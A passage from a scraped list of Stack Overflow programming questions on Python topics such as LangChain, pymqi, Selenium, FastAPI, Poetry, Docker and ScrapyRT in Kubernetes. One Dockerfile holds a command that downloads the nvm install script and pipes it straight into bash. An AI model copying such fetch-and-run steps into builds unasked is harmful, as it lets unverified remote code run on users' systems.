faiss.FAISS.from_texts(chunks, embeddings) ai_response = start_ai_processing( document_search, GOODS_INSTRUCTION_WITH_LIMIT_20_V2, 'gpt-3.5-turbo') end_time = datetime.now() utils.send_slack_message( filename, file_size, start_time, end_time, ai_response, 'gpt-3.5-turbo') return jsonify({'data': ai_response}) def start_ai_processing(document_search, instruction, gpt_model='gpt-3.5-turbo'): chain = load_qa_chain(llm, chain_type=&quot;stuff&quot;) query = instruction docs = document_search.similarity_search(query) result = chain.run(input_documents=docs, question=query) result = result.replace( &quot;```json\n&quot;, &quot;&quot;).replace(&quot;\n```&quot;, &quot;&quot;).replace(&quot;\n&quot;, &quot;&quot;) print(&quot;Result:&quot;, result) parsed_response = json.loads(result) return parsed_response if __name__ == '__main__': app.run(debug=True, port=6000, threaded=False) </code></pre> <p>This is the instruction:</p> <pre><code>GOODS_INSTRUCTION_WITH_LIMIT_20_V2 = (&quot;&quot;&quot; Task: Extract Goods Information from Shipping Invoice and Format as JSON Objective: Analyze a shipping invoice and exclusively extract the list of goods, presenting the details in a structured JSON format with camelCase key names. Maintain the specific document order. Details to Extract for Each Good: Product Code,HS Code / Item Code,Product Description,Quantity,Unit Price / Net,Total Price / Extension,Nett Weight,Gross Weight,Total Volume Extraction and Formatting Instructions: 1.Sequentially retrieve data from the first page to the end. 2.List items exactly as they appear without combining them. 3.For quantity, you can get from total price / unit price 4.Return data in a well-structured JSON format. Any JSON formatting error will result in task failure. 5. Maximum 20 items in the goods list, if there are more than 20 items, just return 20 items and stop processing the rest. The structure of json should be like this: { &quot;goods&quot;: [ { &quot;productCode&quot;: &quot;&quot;, &quot;hsCode&quot;: &quot;&quot;, &quot;productDescription&quot;: &quot;&quot;, &quot;quantity&quot;: 0.0, &quot;unitPrice&quot;: 0.0, &quot;totalPrice&quot;: 0.0, &quot;nettWeight&quot;: 0.0, &quot;grossWeight&quot;: 0.0, &quot;totalVolume&quot;: 0.0 } ] } &quot;&quot;&quot;) </code></pre> <p><strong>Any help will be appreciated!</strong> Thanks</p>
<python><openai-api><langchain><chatgpt-api><chat-gpt-4>
2024-01-13 06:43:17
0
1,143
Webster
77,810,507
8,211,382
How to browse the message based on MsgId or CorrelId from queue in pymqi
<pre><code>import pymqi queue_manager = 'QM1' channel = 'DEV.APP.SVRCONN' host = '127.0.0.1' port = '1414' queue_name = 'TEST.1' message = 'Hello from Python 2!' conn_info = '%s(%s)' % (host, port) </code></pre> <p>First I did the PUT operation like the below code and I worked fine. I put for more 2000 messages</p> <pre><code>qmgr = pymqi.connect(queue_manager, channel, conn_info) queue = pymqi.Queue(qmgr, queue_name) queue.put(message) queue.close() qmgr.disconnect() </code></pre> <p>I tried the below code to get the first message It also worked fine. It gives me the first message. I don't know is the correct approach to get the first message.</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 md = pymqi.MD() md.Format = pymqi.CMQC.MQFMT_STRING message = queue.get(None, md, gmo) print(message) # b'Hello from Python 2!' print(md.MsgId.hex()) #'414d51204e41544d333030202020202817d9ff650a742f22' queue.close() qmgr.disconnect() </code></pre> <p>but when I tried below code it gives me correct message but I this is not the best solution because if I have 2000 messages then it will iterate until the msgId matches.</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 user_MsgId = '414d51204e41544d333030202020202817d9ff650a742f22' overall_message = [] keep_running = True while keep_running: md = pymqi.MD() md.Format = pymqi.CMQC.MQFMT_STRING message = queue.get(None, md, gmo) print(md.MsgId.hex()) if md.MsgId.hex() != user_MsgId: continue: else: overall_message.append(message) break queue.close() qmgr.disconnect() </code></pre> <p>The above solution gives me correct message but when messages are more performance goes down. Can anyone please suggest better approach to browse the message by MsgId or CorrelId?</p> <p>I tried below code as per suggestion I edited here but it is not working:</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.MatchOptions = pymqi.CMQC.MQMO_MATCH_MSG_ID gmo.Version = pymqi.CMQC.MQMO_VERSION_2 gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 md = pymqi.MD() md.Version = pymqi.CMQC.MQMO_VERSION_2 md.Format = pymqi.CMQC.MQFMT_STRING md.MsgId = b'414d51204e41544d333030202020202817d9ff650a742f22' # this is the same output which I get from above message = queue.get(None, md, gmo) print(message) print(md.MsgId.hex()) queue.close() qmgr.disconnect() </code></pre>
<python><ibm-mq><pymqi>
2024-01-13 06:25:05
2
450
user_123
77,810,374
5,795,116
Empty pdf while scraping using Python and Selenium
<p>I'm facing an issue while attempting to print a PDF from a webpage using Selenium in Python. The webpage in question is <a href="https://jamabandi.nic.in/land%20records/NakalRecord" rel="nofollow noreferrer">https://jamabandi.nic.in/land%20records/NakalRecord</a>. I'm trying to select the first record from each drop-down and then click on the &quot;Nakal&quot; button to generate a PDF.</p> <p>However, the resulting PDF is always empty, even though there is a table present on the webpage. I've tried both the manual print-to-PDF operation and automated printing using Selenium, but in both cases, the generated PDF is empty.</p> <pre><code>from selenium import webdriver from selenium.webdriver.chrome.service import Service service = Service() options = webdriver.ChromeOptions() # Set up preferences for printing to PDF settings = { &quot;recentDestinations&quot;: [{&quot;id&quot;: &quot;Save as PDF&quot;, &quot;origin&quot;: &quot;local&quot;, &quot;account&quot;: &quot;&quot;}], &quot;selectedDestinationId&quot;: &quot;Save as PDF&quot;, &quot;version&quot;: 2 } prefs = { 'printing.print_preview_sticky_settings.appState': json.dumps(settings), 'printing.print_to_file': True, 'printing.print_to_file.path': '/Users/jatin/Downloads/output.pdf' # Specify the desired output path } chrome_options.add_experimental_option('prefs', prefs) import urllib.request from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.chrome.options import Options from webdriver_manager.chrome import ChromeDriverManager # Set up Chrome options chrome_options = Options() # chrome_options.add_argument('--headless') # Optional: Run Chrome in headless mode chrome_options.add_argument('--kiosk-printing') try: service = Service(ChromeDriverManager().install()) except ValueError: latest_chromedriver_version_url = &quot;https://chromedriver.storage.googleapis.com/LATEST_RELEASE&quot; latest_chromedriver_version = urllib.request.urlopen(latest_chromedriver_version_url).read().decode('utf-8') service = Service(ChromeDriverManager(version=latest_chromedriver_version).install()) options = Options() url='https://jamabandi.nic.in/land%20records/NakalRecord' # options.add_argument('--headless') #optional. driver = webdriver.Chrome(service=service, options=options) driver.get(url) dropdown_district = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddldname&quot;]')) dropdown_district.select_by_index(1) # Select the tehsil dropdown element and choose the first option,we will loop here for multiple anchals drop_down_tehsil = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddltname&quot;]')) drop_down_tehsil.select_by_index(1) drop_down_vill = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlvname&quot;]')) drop_down_vill.select_by_index(1) drop_down_year = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlPeriod&quot;]')) drop_down_year.select_by_index(1) owner_names=Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]')) dropdown_locator = (By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]') drop_down_owner = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlOwner&quot;]')) drop_down_owner.select_by_index(1) owner_names =Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]')) owner_names.select_by_index(2) page_source = BeautifulSoup(driver.page_source, 'html.parser') table = page_source.find_all('table') div_col_lg_12 = page_source.find('div', class_='col-lg-12') # Find links within the selected div links_within_div = div_col_lg_12.find_all('td') links_within_div # Perform actions on the links or retrieve their attributes for link in links_within_div: k=link.find_all('a') if len(k)&gt;0: new_link=(k[0]['href']) javascript_code = str(new_link) # Execute the JavaScript code driver.execute_script(javascript_code) window_handles=driver.window_handles driver.switch_to.window(window_handles[-1]) # Open the print dialog using JavaScript driver.execute_script('window.print();') </code></pre> <p><a href="https://i.sstatic.net/rQzha.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/rQzha.png" alt="enter image description here" /></a></p> <p><a href="https://i.sstatic.net/0liEg.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/0liEg.png" alt="enter image description here" /></a></p>
<python><pandas><web-scraping><selenium-chromedriver><webdriver>
2024-01-13 05:15:30
1
327
jatin rajani
77,810,274
11,748,924
`%%capture` jupyter notebook or colab doesn't work for storing cell output that display image or table pandas
<p>I have read docs about <code>%%capture cap</code>. It only work for text representation. I expect it stored everything what has been displayed into cell output; image, table, even html element.</p> <p>And then I can load it into another cell with same identical output:</p> <h1>CELL_A</h1> <pre><code>%%capture cap import matplotlib.pyplot as plt # Data x = [1, 2] y = [3, 4] # Create a simple plot plt.plot(x, y) # Add labels to the axes plt.xlabel('X-axis') plt.ylabel('Y-axis') # Add a title to the plot plt.title('Simple Plot Example') # Show the plot plt.show() # Save the captured output to a text file with open('stdout.txt', 'w') as file: file.write(cap.stdout) </code></pre> <h1>CELL_B</h1> <pre><code>#@title Reloading CELL_A output with open('stdout.txt', 'r') as file: cell_a_out = file.read() display(cell_a_out) </code></pre> <p>It should be display matplotlib image. I know matplotlib provide save figure method to save the image. But I expect to save everything that has been displayed in the cell output, not only image. Therefore if the cell returning output table of pandas and matplotlib image it can be stored in the single file.</p>
<python><matplotlib><jupyter-notebook><google-colaboratory><stdout>
2024-01-13 04:10:55
2
1,252
Muhammad Ikhwan Perwira
77,810,225
12,461,032
fastAPI multiple model file relationship causes circular dependency issue
<p>I am relatively new to fastAPI.</p> <p>I am developing a set of APIs. To make my project better structured, I separated my model into multiple files. For now, I have an Employee and Skills table. There is a one to many relationship from employee to skills, where each employee can have multiple skills which are tied together with <code>employee_id</code>.</p> <p>This is my main class, that I have used routers:</p> <pre><code> #main.py app.include_router(skill.router, prefix=&quot;/skill&quot;, tags=[&quot;skill&quot;]) app.include_router(employee.router, prefix=&quot;/employee&quot;, tags=[&quot;employee&quot;]) #employee.py Base = declarative_base() class Employee(Base): __tablename__ = &quot;core_employees&quot; employee_id = mapped_column(Integer, primary_key=True, index=True) first_name = mapped_column(String) last_name = mapped_column(String) skills = relationship(Skill) #skill.py Base = declarative_base() class Skill(Base): __tablename__ = &quot;skills&quot; skill_id = mapped_column(Integer, primary_key=True, index=True) employee_id = mapped_column(Integer, ForeignKey(Employee.employee_id)) skill_name = mapped_column(String) skill_level = mapped_column(Integer) employee = relationship(Employee) </code></pre> <p>The file structure is like this:</p> <pre><code> main.py model/ │ ├── employee.py ├── skill.py </code></pre> <p>I initially had difficulty with separating models into different files, as for instance <code>employee = relationship('Employee')</code> was not working, and I had to pass the actual class.</p> <p>Now there is a problem. <code>skill.py</code> has to import <code>employee.py</code> and vice versa, which is a circular dependency problem.</p> <p>I tried to add both imports to a <a href="https://github.com/pydantic/pydantic/issues/1873" rel="nofollow noreferrer">package</a> (make models a package) but it did not work for me. I also tried <a href="https://stackoverflow.com/questions/63420889/fastapi-pydantic-circular-references-in-separate-files">forward refs</a> which also did not work. Please help me.</p> <p>Thanks.</p>
<python><fastapi><circular-dependency>
2024-01-13 03:31:26
1
472
m0ss
77,810,105
3,973,175
python3's adjust_text is moving text badly
<p>I have overlapping text from my script:</p> <pre><code>import matplotlib.pyplot as plt from adjustText import adjust_text x = [12,471,336,1300] y = [2,5,4,11] z = [0.1,0.2,0.3,0.4] im = plt.scatter(x, y, c = z, cmap = &quot;gist_rainbow&quot;, alpha = 0.5) plt.colorbar(im) texts = [] texts.append(plt.text(783, 7.62372448979592, 'TRL1')) texts.append(plt.text(601, 6.05813953488372, 'CFT1')) texts.append(plt.text(631, 4.28164556962025, 'PTR3')) texts.append(plt.text(665, 7.68018018018018, 'STT4')) texts.append(plt.text(607, 5.45888157894737, 'RSC9')) texts.append(plt.text(914, 4.23497267759563, 'DOP1')) texts.append(plt.text(612, 7.55138662316476, 'SEC8')) texts.append(plt.text(766, 4.1264667535854, 'ATG1')) texts.append(plt.text(681, 3.80205278592375, 'TFC3')) plt.show() </code></pre> <p>which shows overlapping text: <a href="https://i.sstatic.net/Glh77.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Glh77.png" alt="enter image description here" /></a></p> <p>however, when I add <code>adjust_text</code>:</p> <pre><code>import matplotlib.pyplot as plt from adjustText import adjust_text x = [12,471,336,1300] y = [2,5,4,11] z = [0.1,0.2,0.3,0.4] im = plt.scatter(x, y, c = z, cmap = &quot;gist_rainbow&quot;, alpha = 0.5) plt.colorbar(im) data = [ (783, 7.62372448979592, 'TRL1'), (601, 6.05813953488372, 'CFT1'), (631, 4.28164556962025, 'PTR3'), (665, 7.68018018018018, 'STT4'), (607, 5.45888157894737, 'RSC9'), (914, 4.23497267759563, 'DOP1'), (612, 7.55138662316476, 'SEC8'), (766, 4.1264667535854, 'ATG1'), (681, 3.80205278592375, 'TFC3') ] texts = [plt.text(x, y, l) for x, y, l in data] adjust_text(texts) plt.savefig('adjust.text.png', bbox_inches='tight', pad_inches = 0.1) </code></pre> <p>the labels are shifted to the lower left corner, making them useless, instead of just a little overlapped.</p> <p>I am following clues from <code>adjust_text(texts)</code> as suggested by the below two links,</p> <p><a href="https://stackoverflow.com/questions/63583615/how-to-adjust-text-in-matplotlib-scatter-plot-so-scatter-points-dont-overlap">How to adjust text in Matplotlib scatter plot so scatter points don&#39;t overlap?</a></p> <p>and <a href="https://adjusttext.readthedocs.io/en/latest/Examples.html" rel="nofollow noreferrer">https://adjusttext.readthedocs.io/en/latest/Examples.html</a></p> <p>I get this:<a href="https://i.sstatic.net/jF5UG.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/jF5UG.png" alt="enter image description here" /></a></p> <p>how can I get <code>adjust_text</code> to fix the overlapping labels?</p>
<python><python-3.x><matplotlib>
2024-01-13 02:23:50
1
6,227
con
77,810,074
6,423,456
How can I maintain an async CosmosDB connection pool in a FastAPI app?
<p>I have a FastAPI app that uses the <code>azure-cosmos</code> library to store data in a CosmosDB. I'm expecting to have a ton of traffic, so I want to create a pool of async CosmosDB clients.</p> <p>Is that something the azure-cosmos library supports? I can't seem to find any examples of using a connection pool for Cosmos DB. Does it even make sense to have a pool of async CosmosDB clients? Or can one connection handle massive amounts of traffic?</p> <p>If azure-cosmos has no direct support for connection pools, but it makes sense to have a pool, is there a generic library that can assist with maintaining a pool of connections?</p>
<python><azure-cosmosdb><fastapi>
2024-01-13 02:06:58
2
2,774
John
77,810,045
214,526
How to set important features as attribute on XGBRegressor and save as part of json while saving the model
<p>I have trained a <code>XGBRegressor</code> model. Now, I am trying to save the important features as attribute on the model and want that the attribute gets saved/restored along with the model.</p> <p>I have 2 issues here -</p> <p>1.</p> <pre><code>regressor.fit(X=X_train, y=y_train, eval_set=[(X_train, y_train), (X_validation, y_validation)], verbose=False) feature_importance: List[Tuple[str, float]] = sorted( regressor.get_booster().get_score(importance_type=&quot;gain&quot;).items(), key=lambda x: x[1] ) selected_features: List[str] = [x[0] for x in feature_importance if x[1] &gt; 0] setattr(regressor, &quot;selected_features&quot;, selected_features) </code></pre> <p>The <code>setattr</code> and corresponding <code>getattr</code> is giving me lint warnings (B010 and B009) - is there better way to do this to avoid those warnings?</p> <p>The getattr usage is something like this -</p> <pre><code>def get_model_features(model: XGBRegressor) -&gt; List[str] | None: return getattr(model, &quot;selected_features&quot;) if (model is not None and isinstance(model, XGBRegressor) else None </code></pre> <ol start="2"> <li>The attribute does not get saved in the json file. I am using following call to save -</li> </ol> <p><code>regressor.save_model(fname=&quot;model.json&quot;)</code></p> <p>How to accomplish this? I want to avoid pickle save/restore.</p>
<python><python-3.x><xgboost><xgbregressor>
2024-01-13 01:47:43
2
911
soumeng78
77,809,859
2,537,486
Change the type of a column multi-index level?
<p>I am reading a <code>.csv</code> file that looks like this:</p> <pre><code>,1,1,2,2,3,3... ,'A','B','A','B',... 0,1,2,3,4,... 1,2,3,4,5,... </code></pre> <p>I read this with <code>df = pd.read_csv(fname,header=[0,1],index_col=0)</code></p> <p>Now, deplorably, pandas sets the dtype of the first level of the column multiindex to string, even though there are only integers in the first row of the file. Unfortunately, there is no way to tell pandas what dtype to use for each row (level) of the column index. (Something like <code>header={0:'int64',1:'string'}</code>).</p> <p>Now, it seems that there should be a simple and easy way to convert one level of the multiindex columns to <code>int</code>, but I searched for a long time and could not come up with anything. Right now, I am re-generating the index from scratch, but that seems overkill.</p> <p>Another solution that could possibly work would be to convert the multiindex to a DataFrame, change the dtypes, then set the index from the DataFramce. That also seems like an overcomplicated process.</p> <p>Suggestions?</p>
<python><pandas><csv><multi-index>
2024-01-13 00:04:42
2
1,749
germ
77,809,714
7,809,915
Get page with requests without response or status code
<p>I use the following source code:</p> <pre><code>import requests url = &quot;https://www.baha.com/nasdaq-100-index/index/tts-751307/name/asc/1/index/performance/471&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/adobe/stocks/details/tts-117450574&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/advanced-micro-devices/stocks/details/tts-117449963&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/airbnb-inc/stocks/details/tts-208432020&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/alphabet-a/stocks/details/tts-117453820&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/alphabet-c/stocks/details/tts-117453810&quot; web = requests.get(url) print(web.status_code) </code></pre> <p>Most of the time only the first three pages can be parsed, after that there is no status code and the program seems to stop responding or I sometimes get a 503 response even though I could open the page in the browser.</p> <p>How does the problem arise, how can I solve it?</p>
<python><python-3.x><python-requests><python-requests-html>
2024-01-12 23:11:43
1
490
M14
77,809,695
2,474,876
partial() on python types?
<p>I often use type hints to help document code &amp; occasionally when the type signatures are too complex &amp; repeatedly used I alias them like this:</p> <pre class="lang-py prettyprint-override"><code>MyType = Dict[Tuple[int,...], float] # ex: cluster &amp; score. </code></pre> <p>Is there a way in python to parametrize type parts? A common use case is when I want to describe functions returning generators. For instance the <code>Generator[int, None, None]</code> notation works but the unused <code>None</code> details could be hidden in a new type.</p> <p>Does there exists something like <code>partial</code> functions on types where we can &quot;lock in&quot; some of the sub type parameters? Or perhaps this is doable via <code>Generics</code>? Conceptually I'm thinking of something like this:</p> <pre class="lang-py prettyprint-override"><code>MyGenType[int] = functools.partial(Generator, None, None) # pseudo code! </code></pre>
<python><generics><python-typing><type-alias>
2024-01-12 23:04:49
1
417
eliangius
77,809,648
5,960,363
VS Code uses wrong interpreter with Poetry and Docker
<h2>Question</h2> <p>How can I get VS Code to default to my poetry interpreter?</p> <h2>Background</h2> <p>I'm working on a Python project in a dev container based on a Debian image, with the Python extension installed in the container. I use Poetry for dependency management. For debug simplicity I'm running as root.</p> <p>Poetry is successfully installed to <code>/opt/poetry</code> using a <a href="https://python-poetry.org/docs/#installing-manually" rel="nofollow noreferrer">manual install</a>. I run <code>poetry install</code> from my mounted code at <code>/myproject</code>, and Poetry correctly creates a venv outside my mounted volume at <code>/root/.cache/pypoetry/virtualenvs/myproject-somehash-py3.11</code>.</p> <h2>Expected behavior</h2> <p>When I open a .py file for editing, I expect VS Code to select the Python interpreter, based on the <a href="https://code.visualstudio.com/docs/python/environments#_manually-specify-an-interpreter" rel="nofollow noreferrer">VS Code docs</a>:</p> <blockquote> <p>If an interpreter hasn't been specified, then the Python extension automatically selects the interpreter with the highest version in the following priority order:</p> <ol> <li>Virtual environments located directly under the workspace folder.</li> <li>Virtual environments related to the workspace but stored globally. For example, Pipenv or Poetry environments that are located outside of the workspace folder.</li> <li>Globally installed interpreters. For example, the ones found in /usr/local/bin, C:\python38, etc.</li> </ol> </blockquote> <h2>Actual (surprising) behavior</h2> <ul> <li>VS Code (technically it's Python extension, I believe) defaults to the global interpreter at <code>/user/local/bin/python</code>.</li> <li>It <strong>does</strong> find and display the correct Poetry interpreter, in the &quot;Select Interpreter&quot; dialog, but it does not default to that interpreter, which is the behavior I want:</li> </ul> <p><a href="https://i.sstatic.net/96e3w.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/96e3w.png" alt="screencap of interpreter selection window" /></a></p> <ul> <li>If I select the Poetry interpreter manually, this resolves the problem. This isn't a scalable solution (I want team members to be able to &quot;grab and go&quot; with the dev container).</li> <li>I cannot just add the path directly to the interpreter because Poetry adds a hash to the virtual environment folder name (eg. <code>/virtualenvs/myproject-45HY9SC-py3.11/path to python</code></li> <li>I cannot use a .venv in the project root - this is a solution used by some but will not work for my team.</li> </ul> <h2>Potential root cause</h2> <p>I've noticed that inside the venv, <code>bin/python</code> symlinks to <code>/user/local/bin/python</code>. Could Python be following this to the global python and thus &quot;skipping&quot; the poetry Python? Surely that can't be the desired behavior, given the documentation, so I'm skeptical.</p> <p>Note: Poetry offers a setting to <a href="https://python-poetry.org/docs/configuration/#virtualenvsoptionsalways-copy" rel="nofollow noreferrer">always copy</a> rather than symlink, but apparently Python is excepted from this setting (it still symlinks).</p>
<python><docker><visual-studio-code><python-poetry><vscode-remote>
2024-01-12 22:48:08
1
852
FlightPlan
77,809,634
573,082
How to create windows-based CUDA-enabled docker image?
<p>I'm new to docker. I created an executable from python script (with <code>pyinstaller</code>) that I want to run in docker container. That executable needs CUDA. I found CUDA-enabled image from <a href="https://hub.docker.com/r/nvidia/cuda" rel="nofollow noreferrer">here</a>. But, these images are for linux. I cannot find CUDA-enabled image for Windows. I'm not clear what should I do and how to proceed. How can I create an CUDA-enabled image where I could run my executable inside the docker container?</p> <p><strong>Dockerfile</strong></p> <pre><code>FROM nvidia/cuda:12.3.1-base-ubuntu20.04 COPY myapp.exe /app WORKDIR /app CMD [&quot;myapp.exe&quot;] </code></pre>
<python><windows><docker><dockerfile><cuda>
2024-01-12 22:44:15
1
14,501
theateist
77,809,536
709,439
How to store tabular data in Python, to be able to search using different indexes?
<p>I have a table of data, which I read from a database; something like:</p> <div class="s-table-container"> <table class="s-table"> <thead> <tr> <th>id</th> <th>name</th> <th>timestamp</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Alice</td> <td>324234234</td> </tr> <tr> <td>2</td> <td>Bob</td> <td>756756746</td> </tr> <tr> <td>...</td> <td></td> <td></td> </tr> <tr> <td>999</td> <td>Zoe</td> <td>125785753</td> </tr> </tbody> </table> </div> <p>I know I can use a <code>dictionary</code>:</p> <pre><code>people = {} cursor = self.db.query(&quot;SELECT * FROM people&quot;) rows = cursor.fetchall() for row in rows: people[id] = row </code></pre> <p>Then, to search the <code>people</code> dictionary by <code>id</code>, I do:</p> <pre><code>id = 123 if (id in people): print(f&quot;name of person with id {id} is {people[id].name}&quot;) else: print(f&quot;person with id {id} not found in people&quot;) </code></pre> <p>But I would like to be able to search (efficiently, in O(1) time) by <code>timestamp</code>, too:</p> <p>So I ask if I can use a dictionary (and if yes, how to add secondary indexes?), or should I use some other data type?<br /> I'd prefer using python internal data types, avoiding if possible external libraries.</p>
<python><python-3.x>
2024-01-12 22:17:03
1
17,761
MarcoS
77,809,501
9,092,563
ScrapyRT Port Unreachable in Kubernetes Docker Container Pod
<p>I'm experiencing difficulties in accessing a ScrapyRT service running on specific ports within a Kubernetes pod. My setup includes a Kubernetes cluster with a pod running a Scrapy application, which uses ScrapyRT to listen for incoming requests on designated ports. These requests are intended to trigger spiders on the corresponding ports.</p> <p>Despite correctly setting up a Kubernetes service and referencing the Scrapy pod in it, I'm unable to receive any incoming requests to the pod. My understanding is that in Kubernetes networking, a service should be created first, followed by the pod, allowing inter-pod communication and external access through the service. Is this correct?</p> <p>Below are the relevant configurations:<br><br> 
 <strong>scrapy-pod Dockerfile:</strong></p> <pre><code># Use Ubuntu as the base image FROM ubuntu:latest # Avoid prompts from apt ENV DEBIAN_FRONTEND=noninteractive # # Update package repository and install Python, pip, and other utilities RUN apt-get update &amp;&amp; \ apt-get install -y curl software-properties-common iputils-ping net-tools dnsutils vim build-essential python3 python3-pip &amp;&amp; \ rm -rf /var/lib/apt/lists/* # Install nvm (Node Version Manager) - EXPRESS ENV NVM_DIR /usr/local/nvm ENV NODE_VERSION 16.20.1 RUN mkdir -p $NVM_DIR RUN curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.1/install.sh | bash # Install Node.js and npm - EXPRESS RUN . &quot;$NVM_DIR/nvm.sh&quot; &amp;&amp; nvm install $NODE_VERSION &amp;&amp; nvm alias default $NODE_VERSION &amp;&amp; nvm use default # Add Node and npm to path so the commands are available - EXPRESS ENV NODE_PATH $NVM_DIR/versions/node/v$NODE_VERSION/lib/node_modules ENV PATH $NVM_DIR/versions/node/v$NODE_VERSION/bin:$PATH # Install Yarn - EXPRESS RUN npm install --global yarn # Set the working directory in the container to /usr/src/app WORKDIR /usr/src/app # Copy the current directory contents into the container at /usr/src/app COPY . . # Install any needed packages specified in requirements.txt RUN pip3 install --no-cache-dir -r requirements.txt # Copy the start_services.sh script into the container COPY start_services.sh /start_services.sh # Make the script executable RUN chmod +x /start_services.sh # Install any needed packages specified in package.json using Yarn - EXPRESS RUN yarn install # Expose all the necessary ports EXPOSE 14805 14807 12085 14806 13905 12080 14808 8000 # Define environment variable - EXPRESS ENV NODE_ENV production # Run the script when the container starts CMD [&quot;/start_services.sh&quot;] </code></pre> <p><strong>start_services.sh:</strong></p> <pre><code>#!/bin/bash # Start ScrapyRT instances on different ports scrapyrt -p 14805 &amp; scrapyrt -p 14807 &amp; scrapyrt -p 12085 &amp; scrapyrt -p 14806 &amp; scrapyrt -p 13905 &amp; scrapyrt -p 12080 &amp; scrapyrt -p 14808 &amp; # Keep the container running since the ScrapyRT processes are in the background tail -f /dev/null </code></pre> <p>
 <strong>service yaml file:</strong></p> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - name: port-14805 protocol: TCP port: 14805 targetPort: 14805 - name: port-14807 protocol: TCP port: 14807 targetPort: 14807 - name: port-12085 protocol: TCP port: 12085 targetPort: 12085 - name: port-14806 protocol: TCP port: 14806 targetPort: 14806 - name: port-13905 protocol: TCP port: 13905 targetPort: 13905 - name: port-12080 protocol: TCP port: 12080 targetPort: 12080 - name: port-14808 protocol: TCP port: 14808 targetPort: 14808 - name: port-8000 protocol: TCP port: 8000 targetPort: 8000 type: ClusterIP </code></pre> <p>
 <strong>deployment yaml file:</strong></p> <pre><code>apiVersion: apps/v1 kind: Deployment metadata: name: scrapy-deployment labels: app: scrapy-pod spec: replicas: 1 selector: matchLabels: app: scrapy-pod template: metadata: labels: app: scrapy-pod spec: containers: - name: scrapy-pod image: mydockerhub/privaterepository-scrapy:latest imagePullPolicy: Always ports: - containerPort: 14805 - containerPort: 14806 - containerPort: 14807 - containerPort: 12085 - containerPort: 13905 - containerPort: 12080 - containerPort: 8000 envFrom: - secretRef: name: scrapy-env-secret - secretRef: name: express-env-secret imagePullSecrets: - name: my-docker-credentials </code></pre> <p>
 <strong>scrapy-pod's logs in Powershell terminal:</strong></p> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-p59gs -f 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Site starting on 12080 2024-01-09 21:53:27+0000 [-] Site starting on 14808 2024-01-09 21:53:27+0000 [-] Site starting on 14805 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f4cbdf44d60&gt; 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fef9b620a00&gt; 2024-01-09 21:53:27+0000 [-] Site starting on 13905 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Site starting on 14807 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f0892ff4df0&gt; 2024-01-09 21:53:27+0000 [-] Site starting on 14806 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f00d3b99000&gt; 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fba9e321180&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f1782514f10&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Site starting on 12085 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fb2054cd060&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Running with reactor: 